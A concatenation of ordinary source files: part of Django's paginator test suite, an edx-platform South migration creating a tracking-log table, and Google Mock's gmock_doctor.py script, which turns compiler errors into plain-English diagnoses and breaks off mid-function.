(([1, 2], 1, 0, True), (2, 2, [1, 2])),
(([1, 2, 3], 2, 0, True), (3, 2, [1, 2])),
((eleven, 10, 0, True), (11, 2, [1, 2])),
            # Number of items one more than per_page with one orphan.
(([1, 2], 1, 1, True), (2, 1, [1])),
(([1, 2, 3], 2, 1, True), (3, 1, [1])),
((eleven, 10, 1, True), (11, 1, [1])),
# Non-integer inputs
((ten, '4', 1, False), (10, 3, [1, 2, 3])),
((ten, '4', 1, False), (10, 3, [1, 2, 3])),
((ten, 4, '1', False), (10, 3, [1, 2, 3])),
((ten, 4, '1', False), (10, 3, [1, 2, 3])),
)
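        # Worked example of the orphans rule (illustration only): in the
        # ((ten, 4, 2, False), (10, 2, [1, 2])) case above, a plain split
        # would give pages of 4, 4 and 2 items; since the trailing 2 items
        # do not exceed orphans=2, they are folded into the previous page,
        # leaving 2 pages of 4 and 6 items.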
for params, output in tests:
self.check_paginator(params, output)
def test_invalid_page_number(self):
"""
Invalid page numbers result in the correct exception being raised.
"""
paginator = Paginator([1, 2, 3], 2)
with self.assertRaises(InvalidPage):
paginator.page(3)
with self.assertRaises(PageNotAnInteger):
paginator.validate_number(None)
with self.assertRaises(PageNotAnInteger):
paginator.validate_number('x')
with self.assertRaises(PageNotAnInteger):
paginator.validate_number(1.2)
def test_float_integer_page(self):
paginator = Paginator([1, 2, 3], 2)
self.assertEqual(paginator.validate_number(1.0), 1)
def test_no_content_allow_empty_first_page(self):
# With no content and allow_empty_first_page=True, 1 is a valid page number
paginator = Paginator([], 2)
self.assertEqual(paginator.validate_number(1), 1)
def test_paginate_misc_classes(self):
class CountContainer:
def count(self):
return 42
# Paginator can be passed other objects with a count() method.
paginator = Paginator(CountContainer(), 10)
self.assertEqual(42, paginator.count)
self.assertEqual(5, paginator.num_pages)
self.assertEqual([1, 2, 3, 4, 5], list(paginator.page_range))
# Paginator can be passed other objects that implement __len__.
class LenContainer:
def __len__(self):
return 42
paginator = Paginator(LenContainer(), 10)
self.assertEqual(42, paginator.count)
self.assertEqual(5, paginator.num_pages)
self.assertEqual([1, 2, 3, 4, 5], list(paginator.page_range))
def check_indexes(self, params, page_num, indexes):
"""
Helper method that instantiates a Paginator object from the passed
params and then checks that the start and end indexes of the passed
page_num match those given as a 2-tuple in indexes.
"""
paginator = Paginator(*params)
if page_num == 'first':
page_num = 1
elif page_num == 'last':
page_num = paginator.num_pages
page = paginator.page(page_num)
start, end = indexes
msg = ("For %s of page %s, expected %s but got %s. Paginator parameters were: %s")
self.assertEqual(start, page.start_index(), msg % ('start index', page_num, start, page.start_index(), params))
self.assertEqual(end, page.end_index(), msg % ('end index', page_num, end, page.end_index(), params))
def test_page_indexes(self):
"""
Paginator pages have the correct start and end indexes.
"""
ten = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
tests = (
# Each item is three tuples:
# First tuple is Paginator parameters - object_list, per_page,
# orphans, and allow_empty_first_page.
# Second tuple is the start and end indexes of the first page.
# Third tuple is the start and end indexes of the last page.
# Ten items, varying per_page, no orphans.
((ten, 1, 0, True), (1, 1), (10, 10)),
((ten, 2, 0, True), (1, 2), (9, 10)),
((ten, 3, 0, True), (1, 3), (10, 10)),
((ten, 5, 0, True), (1, 5), (6, 10)),
# Ten items, varying per_page, with orphans.
((ten, 1, 1, True), (1, 1), (9, 10)),
((ten, 1, 2, True), (1, 1), (8, 10)),
((ten, 3, 1, True), (1, 3), (7, 10)),
((ten, 3, 2, True), (1, 3), (7, 10)),
((ten, 3, 4, True), (1, 3), (4, 10)),
((ten, 5, 1, True), (1, 5), (6, 10)),
((ten, 5, 2, True), (1, 5), (6, 10)),
((ten, 5, 5, True), (1, 10), (1, 10)),
# One item, varying orphans, no empty first page.
(([1], 4, 0, False), (1, 1), (1, 1)),
(([1], 4, 1, False), (1, 1), (1, 1)),
(([1], 4, 2, False), (1, 1), (1, 1)),
# One item, varying orphans, allow empty first page.
(([1], 4, 0, True), (1, 1), (1, 1)),
(([1], 4, 1, True), (1, 1), (1, 1)),
(([1], 4, 2, True), (1, 1), (1, 1)),
# Zero items, varying orphans, allow empty first page.
(([], 4, 0, True), (0, 0), (0, 0)),
(([], 4, 1, True), (0, 0), (0, 0)),
(([], 4, 2, True), (0, 0), (0, 0)),
)
for params, first, last in tests:
self.check_indexes(params, 'first', first)
self.check_indexes(params, 'last', last)
# When no items and no empty first page, we should get EmptyPage error.
with self.assertRaises(EmptyPage):
self.check_indexes(([], 4, 0, False), 1, None)
with self.assertRaises(EmptyPage):
self.check_indexes(([], 4, 1, False), 1, None)
with self.assertRaises(EmptyPage):
self.check_indexes(([], 4, 2, False), 1, None)
def test_page_sequence(self):
"""
A paginator page acts like a standard sequence.
"""
eleven = 'abcdefghijk'
page2 = Paginator(eleven, per_page=5, orphans=1).page(2)
self.assertEqual(len(page2), 6)
self.assertIn('k', page2)
self.assertNotIn('a', page2)
self.assertEqual(''.join(page2), 'fghijk')
self.assertEqual(''.join(reversed(page2)), 'kjihgf')
def test_get_page_hook(self):
"""
A Paginator subclass can use the ``_get_page`` hook to
return an alternative to the standard Page class.
"""
eleven = 'abcdefghijk'
paginator = ValidAdjacentNumsPaginator(eleven, per_page=6)
page1 = paginator.page(1)
page2 = paginator.page(2)
self.assertIsNone(page1.previous_page_number())
self.assertEqual(page1.next_page_number(), 2)
self.assertEqual(page2.previous_page_number(), 1)
self.assertIsNone(page2.next_page_number())
def test_page_range_iterator(self):
"""
Paginator.page_range should be an iterator.
"""
self.assertIsInstance(Paginator([1, 2, 3], 2).page_range, type(range(0)))
def test_get_page(self):
"""
Paginator.get_page() returns a valid page even with invalid page
arguments.
"""
paginator = Paginator([1, 2, 3], 2)
page = paginator.get_page(1)
self.assertEqual(page.number, 1)
self.assertEqual(page.object_list, [1, 2])
# An empty page returns the last page.
self.assertEqual(paginator.get_page(3).number, 2)
# Non-integer page returns the first page.
self.assertEqual(paginator.get_page(None).number, 1)
def test_get_page_empty_object_list(self):
"""Paginator.get_page() with an empty object_list."""
paginator = Paginator([], 2)
# An empty page returns the last page.
self.assertEqual(paginator.get_page(1).number, 1)
self.assertEqual(paginator.get_page(2).number, 1)
# Non-integer page returns the first page.
self.assertEqual(paginator.get_page(None).number, 1)
def test_get_page_empty_object_list_and_allow_empty_first_page_false(self):
"""
Paginator.get_page() raises EmptyPage if allow_empty_first_page=False
and object_list is empty.
"""
paginator = Paginator([], 2, allow_empty_first_page=False)
with self.assertRaises(EmptyPage):
paginator.get_page(1)
class ModelPaginationTests(TestCase):
"""
Test pagination with Django model instances
"""
def setUp(self):
# Prepare a list of objects for pagination.
for x in range(1, 10):
a = Article(headline='Article %s' % x, pub_date=datetime(2005, 7, 29))
a.save()
def test_first_page(self):
paginator = Paginator(Article.objects.order_by('id'), 5)
p = paginator.page(1)
self.assertEqual("<Page 1 of 2>", str(p))
self.assertQuerysetEqual(p.object_list, [
"<Article: Article 1>",
"<Article: Article 2>",
"<Article: Article 3>",
"<Article: Article 4>",
"<Article: Article 5>"
])
self.assertTrue(p.has_next())
self.assertFalse(p.has_previous())
self.assertTrue(p.has_other_pages())
self.assertEqual(2, p.next_page_number())
with self.assertRaises(InvalidPage):
p.previous_page_number()
self.assertEqual(1, p.start_index())
self.assertEqual(5, p.end_index())
def test_last_page(self):
paginator = Paginator(Article.objects.order_by('id'), 5)
p = paginator.page(2)
self.assertEqual("<Page 2 of 2>", str(p))
self.assertQuerysetEqual(p.object_list, [
"<Article: Article 6>",
"<Article: Article 7>",
"<Article: Article 8>",
"<Article: Article 9>"
])
self.assertFalse(p.has_next())
self.assertTrue(p.has_previous())
self.assertTrue(p.has_other_pages())
with self.assertRaises(InvalidPage):
p.next_page_number()
self.assertEqual(1, p.previous_page_number())
self.assertEqual(6, p.start_index())
self.assertEqual(9, p.end_index())
def test_page_getitem(self):
"""
Tests proper behavior of a paginator page __getitem__ (queryset
evaluation, slicing, exception raised).
"""
paginator = Paginator(Article.objects.order_by('id'), 5)
p = paginator.page(1)
# Make sure object_list queryset is not evaluated by an invalid __getitem__ call.
# (this happens from the template engine when using eg: {% page_obj.has_previous %})
self.assertIsNone(p.object_list._result_cache)
with self.assertRaises(TypeError):
p['has_previous']
self.assertIsNone(p.object_list._result_cache)
self.assertNotIsInstance(p.object_list, list)
# Make sure slicing the Page object with numbers and slice objects work.
self.assertEqual(p[0], Article.objects.get(headline='Article 1'))
self.assertQuerysetEqual(p[slice(2)], [
"<Article: Article 1>",
"<Article: Article 2>",
]
)
# After __getitem__ is called, object_list is a list
self.assertIsInstance(p.object_list, list)
def test_paginating_unordered_queryset_raises_warning(self):
msg = (
"Pagination may yield inconsistent results with an unordered "
"object_list: <class 'pagination.models.Article'> QuerySet."
)
with self.assertWarnsMessage(UnorderedObjectListWarning, msg) as cm:
Paginator(Article.objects.all(), 5)
# The warning points at the Paginator caller (i.e. the stacklevel
# is appropriate).
self.assertEqual(cm.filename, __file__)
def test_paginating_unordered_object_list_raises_warning(self):
"""
Unordered object list warning with an object that has an ordered
attribute but not a model attribute.
"""
class ObjectList:
ordered = False
object_list = ObjectList()
msg = (
"Pagination may yield inconsistent results with an unordered "
"object_list: {!r}.".format(object_list)
)
with self.assertWarnsMessage(UnorderedObjectListWarning, msg):
Paginator(object_list, 5)
| agpl-3.0 |
LICEF/edx-platform | common/djangoapps/track/migrations/0001_initial.py | 189 | 2527 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'TrackingLog'
db.create_table('track_trackinglog', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('dtcreated', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('username', self.gf('django.db.models.fields.CharField')(max_length=32, blank=True)),
('ip', self.gf('django.db.models.fields.CharField')(max_length=32, blank=True)),
('event_source', self.gf('django.db.models.fields.CharField')(max_length=32)),
('event_type', self.gf('django.db.models.fields.CharField')(max_length=32, blank=True)),
('event', self.gf('django.db.models.fields.TextField')(blank=True)),
('agent', self.gf('django.db.models.fields.CharField')(max_length=256, blank=True)),
('page', self.gf('django.db.models.fields.CharField')(max_length=32, null=True, blank=True)),
('time', self.gf('django.db.models.fields.DateTimeField')()),
))
db.send_create_signal('track', ['TrackingLog'])
def backwards(self, orm):
# Deleting model 'TrackingLog'
db.delete_table('track_trackinglog')
models = {
'track.trackinglog': {
'Meta': {'object_name': 'TrackingLog'},
'agent': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'dtcreated': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'event': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'event_source': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'event_type': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'page': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'time': ('django.db.models.fields.DateTimeField', [], {}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'})
}
}
complete_apps = ['track']
| agpl-3.0 |
Abce/googlemock | scripts/gmock_doctor.py | 48 | 24117 | #!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Converts compiler's errors in code using Google Mock to plain English."""
__author__ = '[email protected] (Zhanyong Wan)'
import re
import sys
_VERSION = '1.0.3'
_EMAIL = '[email protected]'
_COMMON_GMOCK_SYMBOLS = [
# Matchers
'_',
'A',
'AddressSatisfies',
'AllOf',
'An',
'AnyOf',
'ContainerEq',
'Contains',
'ContainsRegex',
'DoubleEq',
'ElementsAre',
'ElementsAreArray',
'EndsWith',
'Eq',
'Field',
'FloatEq',
'Ge',
'Gt',
'HasSubstr',
'IsInitializedProto',
'Le',
'Lt',
'MatcherCast',
'Matches',
'MatchesRegex',
'NanSensitiveDoubleEq',
'NanSensitiveFloatEq',
'Ne',
'Not',
'NotNull',
'Pointee',
'Property',
'Ref',
'ResultOf',
'SafeMatcherCast',
'StartsWith',
'StrCaseEq',
'StrCaseNe',
'StrEq',
'StrNe',
'Truly',
'TypedEq',
'Value',
# Actions
'Assign',
'ByRef',
'DeleteArg',
'DoAll',
'DoDefault',
'IgnoreResult',
'Invoke',
'InvokeArgument',
'InvokeWithoutArgs',
'Return',
'ReturnNew',
'ReturnNull',
'ReturnRef',
'SaveArg',
'SetArgReferee',
'SetArgPointee',
'SetArgumentPointee',
'SetArrayArgument',
'SetErrnoAndReturn',
'Throw',
'WithArg',
'WithArgs',
'WithoutArgs',
# Cardinalities
'AnyNumber',
'AtLeast',
'AtMost',
'Between',
'Exactly',
# Sequences
'InSequence',
'Sequence',
# Misc
'DefaultValue',
'Mock',
]
# Regex for matching source file path and line number in the compiler's errors.
_GCC_FILE_LINE_RE = r'(?P<file>.*):(?P<line>\d+):(\d+:)?\s+'
_CLANG_FILE_LINE_RE = r'(?P<file>.*):(?P<line>\d+):(?P<column>\d+):\s+'
_CLANG_NON_GMOCK_FILE_LINE_RE = (
r'(?P<file>.*[/\\^](?!gmock-)[^/\\]+):(?P<line>\d+):(?P<column>\d+):\s+')
def _FindAllMatches(regex, s):
"""Generates all matches of regex in string s."""
r = re.compile(regex)
return r.finditer(s)
def _GenericDiagnoser(short_name, long_name, diagnoses, msg):
"""Diagnoses the given disease by pattern matching.
Can provide different diagnoses for different patterns.
Args:
short_name: Short name of the disease.
long_name: Long name of the disease.
diagnoses: A list of pairs (regex, pattern for formatting the diagnosis
for matching regex).
msg: Compiler's error messages.
Yields:
Tuples of the form
(short name of disease, long name of disease, diagnosis).
"""
for regex, diagnosis in diagnoses:
if re.search(regex, msg):
diagnosis = '%(file)s:%(line)s:' + diagnosis
for m in _FindAllMatches(regex, msg):
yield (short_name, long_name, diagnosis % m.groupdict())
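# Illustrative sketch (not part of the original script, and intentionally not
# registered in _DIAGNOSERS): a minimal diagnoser built on top of
# _GenericDiagnoser. The regex and wording here are hypothetical; the real
# diagnosers below pair compiler-specific regexes with a diagnosis template
# whose %(...)s fields come from the regex's named groups.
def _ExampleDiagnoser(msg):
  """Diagnoses a hypothetical EX disease, for illustration only."""
  gcc_regex = (_GCC_FILE_LINE_RE + r'error: hypothetical pattern')
  diagnosis = """
This is where the plain-English explanation would go."""
  return _GenericDiagnoser('EX', 'Example Disease',
                           [(gcc_regex, diagnosis)],
                           msg)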
def _NeedToReturnReferenceDiagnoser(msg):
"""Diagnoses the NRR disease, given the error messages by the compiler."""
gcc_regex = (r'In member function \'testing::internal::ReturnAction<R>.*\n'
+ _GCC_FILE_LINE_RE + r'instantiated from here\n'
r'.*gmock-actions\.h.*error: creating array with negative size')
clang_regex = (r'error:.*array.*negative.*\r?\n'
r'(.*\n)*?' +
_CLANG_NON_GMOCK_FILE_LINE_RE +
r'note: in instantiation of function template specialization '
r'\'testing::internal::ReturnAction<(?P<type>.*)>'
r'::operator Action<.*>\' requested here')
clang11_re = (r'use_ReturnRef_instead_of_Return_to_return_a_reference.*'
r'(.*\n)*?' + _CLANG_NON_GMOCK_FILE_LINE_RE)
diagnosis = """
You are using a Return() action in a function that returns a reference to
%(type)s. Please use ReturnRef() instead."""
return _GenericDiagnoser('NRR', 'Need to Return Reference',
[(clang_regex, diagnosis),
(clang11_re, diagnosis % {'type': 'a type'}),
(gcc_regex, diagnosis % {'type': 'a type'})],
msg)
def _NeedToReturnSomethingDiagnoser(msg):
"""Diagnoses the NRS disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'(instantiated from here\n.'
r'*gmock.*actions\.h.*error: void value not ignored)'
r'|(error: control reaches end of non-void function)')
clang_regex1 = (_CLANG_FILE_LINE_RE +
r'error: cannot initialize return object '
r'of type \'Result\' \(aka \'(?P<return_type>.*)\'\) '
r'with an rvalue of type \'void\'')
clang_regex2 = (_CLANG_FILE_LINE_RE +
r'error: cannot initialize return object '
r'of type \'(?P<return_type>.*)\' '
r'with an rvalue of type \'void\'')
diagnosis = """
You are using an action that returns void, but it needs to return
%(return_type)s. Please tell it *what* to return. Perhaps you can use
the pattern DoAll(some_action, Return(some_value))?"""
return _GenericDiagnoser(
'NRS',
'Need to Return Something',
[(gcc_regex, diagnosis % {'return_type': '*something*'}),
(clang_regex1, diagnosis),
(clang_regex2, diagnosis)],
msg)
def _NeedToReturnNothingDiagnoser(msg):
"""Diagnoses the NRN disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'instantiated from here\n'
r'.*gmock-actions\.h.*error: instantiation of '
r'\'testing::internal::ReturnAction<R>::Impl<F>::value_\' '
r'as type \'void\'')
clang_regex1 = (r'error: field has incomplete type '
r'\'Result\' \(aka \'void\'\)(\r)?\n'
r'(.*\n)*?' +
_CLANG_NON_GMOCK_FILE_LINE_RE + r'note: in instantiation '
r'of function template specialization '
r'\'testing::internal::ReturnAction<(?P<return_type>.*)>'
r'::operator Action<void \(.*\)>\' requested here')
clang_regex2 = (r'error: field has incomplete type '
r'\'Result\' \(aka \'void\'\)(\r)?\n'
r'(.*\n)*?' +
_CLANG_NON_GMOCK_FILE_LINE_RE + r'note: in instantiation '
r'of function template specialization '
r'\'testing::internal::DoBothAction<.*>'
r'::operator Action<(?P<return_type>.*) \(.*\)>\' '
r'requested here')
diagnosis = """
You are using an action that returns %(return_type)s, but it needs to return
void. Please use a void-returning action instead.
All actions but the last in DoAll(...) must return void. Perhaps you need
to re-arrange the order of actions in a DoAll(), if you are using one?"""
return _GenericDiagnoser(
'NRN',
'Need to Return Nothing',
[(gcc_regex, diagnosis % {'return_type': '*something*'}),
(clang_regex1, diagnosis),
(clang_regex2, diagnosis)],
msg)
def _IncompleteByReferenceArgumentDiagnoser(msg):
"""Diagnoses the IBRA disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'instantiated from here\n'
r'.*gtest-printers\.h.*error: invalid application of '
r'\'sizeof\' to incomplete type \'(?P<type>.*)\'')
clang_regex = (r'.*gtest-printers\.h.*error: invalid application of '
r'\'sizeof\' to an incomplete type '
r'\'(?P<type>.*)( const)?\'\r?\n'
r'(.*\n)*?' +
_CLANG_NON_GMOCK_FILE_LINE_RE +
r'note: in instantiation of member function '
r'\'testing::internal2::TypeWithoutFormatter<.*>::'
r'PrintValue\' requested here')
diagnosis = """
In order to mock this function, Google Mock needs to see the definition
of type "%(type)s" - declaration alone is not enough. Either #include
the header that defines it, or change the argument to be passed
by pointer."""
return _GenericDiagnoser('IBRA', 'Incomplete By-Reference Argument Type',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis)],
msg)
def _OverloadedFunctionMatcherDiagnoser(msg):
"""Diagnoses the OFM disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'error: no matching function for '
r'call to \'Truly\(<unresolved overloaded function type>\)')
clang_regex = (_CLANG_FILE_LINE_RE + r'error: no matching function for '
r'call to \'Truly')
diagnosis = """
The argument you gave to Truly() is an overloaded function. Please tell
your compiler which overloaded version you want to use.
For example, if you want to use the version whose signature is
bool Foo(int n);
you should write
Truly(static_cast<bool (*)(int n)>(Foo))"""
return _GenericDiagnoser('OFM', 'Overloaded Function Matcher',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis)],
msg)
def _OverloadedFunctionActionDiagnoser(msg):
"""Diagnoses the OFA disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'error: no matching function for call to '
r'\'Invoke\(<unresolved overloaded function type>')
clang_regex = (_CLANG_FILE_LINE_RE + r'error: no matching '
r'function for call to \'Invoke\'\r?\n'
r'(.*\n)*?'
r'.*\bgmock-generated-actions\.h:\d+:\d+:\s+'
r'note: candidate template ignored:\s+'
r'couldn\'t infer template argument \'FunctionImpl\'')
diagnosis = """
Function you are passing to Invoke is overloaded. Please tell your compiler
which overloaded version you want to use.
For example, if you want to use the version whose signature is
bool MyFunction(int n, double x);
you should write something like
Invoke(static_cast<bool (*)(int n, double x)>(MyFunction))"""
return _GenericDiagnoser('OFA', 'Overloaded Function Action',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis)],
msg)
def _OverloadedMethodActionDiagnoser(msg):
"""Diagnoses the OMA disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'error: no matching function for '
r'call to \'Invoke\(.+, <unresolved overloaded function '
r'type>\)')
clang_regex = (_CLANG_FILE_LINE_RE + r'error: no matching function '
r'for call to \'Invoke\'\r?\n'
r'(.*\n)*?'
r'.*\bgmock-generated-actions\.h:\d+:\d+: '
r'note: candidate function template not viable: '
r'requires .*, but 2 (arguments )?were provided')
diagnosis = """
The second argument you gave to Invoke() is an overloaded method. Please
tell your compiler which overloaded version you want to use.
For example, if you want to use the version whose signature is
class Foo {
...
bool Bar(int n, double x);
};
you should write something like
Invoke(foo, static_cast<bool (Foo::*)(int n, double x)>(&Foo::Bar))"""
return _GenericDiagnoser('OMA', 'Overloaded Method Action',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis)],
msg)
def _MockObjectPointerDiagnoser(msg):
"""Diagnoses the MOP disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'error: request for member '
r'\'gmock_(?P<method>.+)\' in \'(?P<mock_object>.+)\', '
r'which is of non-class type \'(.*::)*(?P<class_name>.+)\*\'')
clang_regex = (_CLANG_FILE_LINE_RE + r'error: member reference type '
r'\'(?P<class_name>.*?) *\' is a pointer; '
r'(did you mean|maybe you meant) to use \'->\'\?')
diagnosis = """
The first argument to ON_CALL() and EXPECT_CALL() must be a mock *object*,
not a *pointer* to it. Please write '*(%(mock_object)s)' instead of
'%(mock_object)s' as your first argument.
For example, given the mock class:
class %(class_name)s : public ... {
...
MOCK_METHOD0(%(method)s, ...);
};
and the following mock instance:
%(class_name)s* mock_ptr = ...
you should use the EXPECT_CALL like this:
EXPECT_CALL(*mock_ptr, %(method)s(...));"""
return _GenericDiagnoser(
'MOP',
'Mock Object Pointer',
[(gcc_regex, diagnosis),
(clang_regex, diagnosis % {'mock_object': 'mock_object',
'method': 'method',
'class_name': '%(class_name)s'})],
msg)
def _NeedToUseSymbolDiagnoser(msg):
"""Diagnoses the NUS disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE + r'error: \'(?P<symbol>.+)\' '
r'(was not declared in this scope|has not been declared)')
clang_regex = (_CLANG_FILE_LINE_RE +
r'error: (use of undeclared identifier|unknown type name|'
r'no template named) \'(?P<symbol>[^\']+)\'')
diagnosis = """
'%(symbol)s' is defined by Google Mock in the testing namespace.
Did you forget to write
using testing::%(symbol)s;
?"""
for m in (list(_FindAllMatches(gcc_regex, msg)) +
list(_FindAllMatches(clang_regex, msg))):
symbol = m.groupdict()['symbol']
if symbol in _COMMON_GMOCK_SYMBOLS:
yield ('NUS', 'Need to Use Symbol', diagnosis % m.groupdict())
def _NeedToUseReturnNullDiagnoser(msg):
"""Diagnoses the NRNULL disease, given the error messages by the compiler."""
gcc_regex = ('instantiated from \'testing::internal::ReturnAction<R>'
'::operator testing::Action<Func>\(\) const.*\n' +
_GCC_FILE_LINE_RE + r'instantiated from here\n'
r'.*error: no matching function for call to \'ImplicitCast_\('
r'(:?long )?int&\)')
clang_regex = (r'\bgmock-actions.h:.* error: no matching function for '
r'call to \'ImplicitCast_\'\r?\n'
r'(.*\n)*?' +
_CLANG_NON_GMOCK_FILE_LINE_RE + r'note: in instantiation '
r'of function template specialization '
r'\'testing::internal::ReturnAction<(int|long)>::operator '
r'Action<(?P<type>.*)\(\)>\' requested here')
diagnosis = """
You are probably calling Return(NULL) and the compiler isn't sure how to turn
NULL into %(type)s. Use ReturnNull() instead.
Note: the line number may be off; please fix all instances of Return(NULL)."""
return _GenericDiagnoser(
'NRNULL', 'Need to use ReturnNull',
[(clang_regex, diagnosis),
(gcc_regex, diagnosis % {'type': 'the right type'})],
msg)
def _TypeInTemplatedBaseDiagnoser(msg):
"""Diagnoses the TTB disease, given the error messages by the compiler."""
# This version works when the type is used as the mock function's return
# type.
gcc_4_3_1_regex_type_in_retval = (
r'In member function \'int .*\n' + _GCC_FILE_LINE_RE +
r'error: a function call cannot appear in a constant-expression')
gcc_4_4_0_regex_type_in_retval = (
r'error: a function call cannot appear in a constant-expression'
+ _GCC_FILE_LINE_RE + r'error: template argument 1 is invalid\n')
# This version works when the type is used as the mock function's sole
# parameter type.
gcc_regex_type_of_sole_param = (
_GCC_FILE_LINE_RE +
r'error: \'(?P<type>.+)\' was not declared in this scope\n'
r'.*error: template argument 1 is invalid\n')
# This version works when the type is used as a parameter of a mock
# function that has multiple parameters.
gcc_regex_type_of_a_param = (
r'error: expected `;\' before \'::\' token\n'
+ _GCC_FILE_LINE_RE +
r'error: \'(?P<type>.+)\' was not declared in this scope\n'
r'.*error: template argument 1 is invalid\n'
r'.*error: \'.+\' was not declared in this scope')
clang_regex_type_of_retval_or_sole_param = (
_CLANG_FILE_LINE_RE +
r'error: use of undeclared identifier \'(?P<type>.*)\'\n'
r'(.*\n)*?'
r'(?P=file):(?P=line):\d+: error: '
r'non-friend class member \'Result\' cannot have a qualified name'
)
clang_regex_type_of_a_param = (
_CLANG_FILE_LINE_RE +
r'error: C\+\+ requires a type specifier for all declarations\n'
r'(.*\n)*?'
r'(?P=file):(?P=line):(?P=column): error: '
r'C\+\+ requires a type specifier for all declarations'
)
clang_regex_unknown_type = (
_CLANG_FILE_LINE_RE +
r'error: unknown type name \'(?P<type>[^\']+)\''
)
diagnosis = """
In a mock class template, types or typedefs defined in the base class
template are *not* automatically visible. This is how C++ works. Before
you can use a type or typedef named %(type)s defined in base class Base<T>, you
need to make it visible. One way to do it is:
typedef typename Base<T>::%(type)s %(type)s;"""
for diag in _GenericDiagnoser(
'TTB', 'Type in Template Base',
[(gcc_4_3_1_regex_type_in_retval, diagnosis % {'type': 'Foo'}),
(gcc_4_4_0_regex_type_in_retval, diagnosis % {'type': 'Foo'}),
(gcc_regex_type_of_sole_param, diagnosis),
(gcc_regex_type_of_a_param, diagnosis),
(clang_regex_type_of_retval_or_sole_param, diagnosis),
(clang_regex_type_of_a_param, diagnosis % {'type': 'Foo'})],
msg):
yield diag
# Avoid overlap with the NUS pattern.
for m in _FindAllMatches(clang_regex_unknown_type, msg):
type_ = m.groupdict()['type']
if type_ not in _COMMON_GMOCK_SYMBOLS:
yield ('TTB', 'Type in Template Base', diagnosis % m.groupdict())
def _WrongMockMethodMacroDiagnoser(msg):
"""Diagnoses the WMM disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE +
r'.*this_method_does_not_take_(?P<wrong_args>\d+)_argument.*\n'
r'.*\n'
r'.*candidates are.*FunctionMocker<[^>]+A(?P<args>\d+)\)>')
clang_regex = (_CLANG_NON_GMOCK_FILE_LINE_RE +
                 r'error:.*array.*negative.*\r?\n'
r'(.*\n)*?'
r'(?P=file):(?P=line):(?P=column): error: too few arguments '
r'to function call, expected (?P<args>\d+), '
r'have (?P<wrong_args>\d+)')
clang11_re = (_CLANG_NON_GMOCK_FILE_LINE_RE +
r'.*this_method_does_not_take_'
r'(?P<wrong_args>\d+)_argument.*')
diagnosis = """
You are using MOCK_METHOD%(wrong_args)s to define a mock method that has
%(args)s arguments. Use MOCK_METHOD%(args)s (or MOCK_CONST_METHOD%(args)s,
MOCK_METHOD%(args)s_T, MOCK_CONST_METHOD%(args)s_T as appropriate) instead."""
return _GenericDiagnoser('WMM', 'Wrong MOCK_METHODn Macro',
[(gcc_regex, diagnosis),
(clang11_re, diagnosis % {'wrong_args': 'm',
'args': 'n'}),
(clang_regex, diagnosis)],
msg)
def _WrongParenPositionDiagnoser(msg):
"""Diagnoses the WPP disease, given the error messages by the compiler."""
gcc_regex = (_GCC_FILE_LINE_RE +
r'error:.*testing::internal::MockSpec<.* has no member named \''
r'(?P<method>\w+)\'')
clang_regex = (_CLANG_NON_GMOCK_FILE_LINE_RE +
r'error: no member named \'(?P<method>\w+)\' in '
r'\'testing::internal::MockSpec<.*>\'')
diagnosis = """
